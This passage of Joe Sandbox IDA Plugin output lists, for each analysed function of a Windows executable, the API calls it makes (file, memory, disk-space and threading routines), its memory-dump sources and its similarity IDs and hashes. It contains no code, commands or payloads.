                                                                • Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                • Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
                                                                • Opcode Fuzzy Hash: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                • Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D
                                                                APIs
                                                                  • Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 0041821D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 00418381
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2803161813-0
                                                                • Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                • Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
                                                                • Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                • Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                • Opcode ID: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                • Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
                                                                • Opcode Fuzzy Hash: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                • Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754
                                                                APIs
                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 0040129F
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeMessageSendSpace
                                                                • String ID:
                                                                • API String ID: 696007252-0
                                                                • Opcode ID: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                • Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
                                                                • Opcode Fuzzy Hash: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                • Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402815
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402839
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                • Opcode ID: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                • Instruction ID: bcdea4c81718d913e52e4f2a3d02f3e10d2d0235028ef0e1c46e76d630642e7e
                                                                • Opcode Fuzzy Hash: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                • Instruction Fuzzy Hash: 9AF0903A0046419FC330AF2AC594843FBE8EB59714720CD7FE1D6D36A2C674A880C764
                                                                APIs
                                                                • SetEnvironmentVariableW.KERNELBASE(?,?,?,?,?,004068AF,00000000,?,?,?,00000000,?,?), ref: 0040498E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00404997
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@EnvironmentVariable
                                                                • String ID:
                                                                • API String ID: 3880889418-0
                                                                • Opcode ID: f899844df334fa484cc3d15b82790f2c382d52c79a2c3a6cc3fb3bd9e8382a87
                                                                • Instruction ID: 45721f2f61f3a03145150eac3bdacb786a061e167d978f15f422af1a49713dfd
                                                                • Opcode Fuzzy Hash: f899844df334fa484cc3d15b82790f2c382d52c79a2c3a6cc3fb3bd9e8382a87
                                                                • Instruction Fuzzy Hash: 6BF01975900118AFC711EF96ED91CCE7778FB48704710407AFD51A7161DB34D955CB85
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0041232E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                • API String ID: 2976181284-0
                                                                • Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                • Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
                                                                • Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                • Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: b075649f231de9eb948ae6cc86e6b3af4d7c96d89014706d31f654389e5865e8
                                                                • Instruction ID: 727f3f96c1ea9d64df56d7fdf8b054f85097dd798dff9fcd5129ed1c701011a3
                                                                • Opcode Fuzzy Hash: b075649f231de9eb948ae6cc86e6b3af4d7c96d89014706d31f654389e5865e8
                                                                • Instruction Fuzzy Hash: 14E04F366056109FC6249FA2D814D96B3A8EF0972130549AEE8459BA60CB34EC418B84
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 004134D2
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID:
                                                                • API String ID: 3168844106-0
                                                                • Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                • Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
                                                                • Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                • Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                • Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
                                                                • Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                • Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59
                                                                APIs
                                                                  • Part of subcall function 0041229A: CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateFileHandle
                                                                • String ID:
                                                                • API String ID: 3498533004-0
                                                                • Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                • Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
                                                                • Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                • Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                • Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
                                                                • Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                • Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                • Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
                                                                • Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                • Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: _beginthreadex
                                                                • String ID:
                                                                • API String ID: 3014514943-0
                                                                • Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                • Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
                                                                • Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                • Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                • Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
                                                                • Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                • Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                • Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
                                                                • Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                • Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE
                                                                APIs
                                                                • SysAllocString.OLEAUT32(?), ref: 0040119C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AllocString
                                                                • String ID:
                                                                • API String ID: 2525500382-0
                                                                • Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                • Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
                                                                • Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                • Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                • Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
                                                                • Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                • Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618
                                                                APIs
                                                                • SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FileTime
                                                                • String ID:
                                                                • API String ID: 1425588814-0
                                                                • Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                • Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
                                                                • Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                • Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00000000,?,?,?,?,?,?,00401AD3,?), ref: 004015F7
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                • Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
                                                                • Opcode Fuzzy Hash: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                • Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69
                                                                APIs
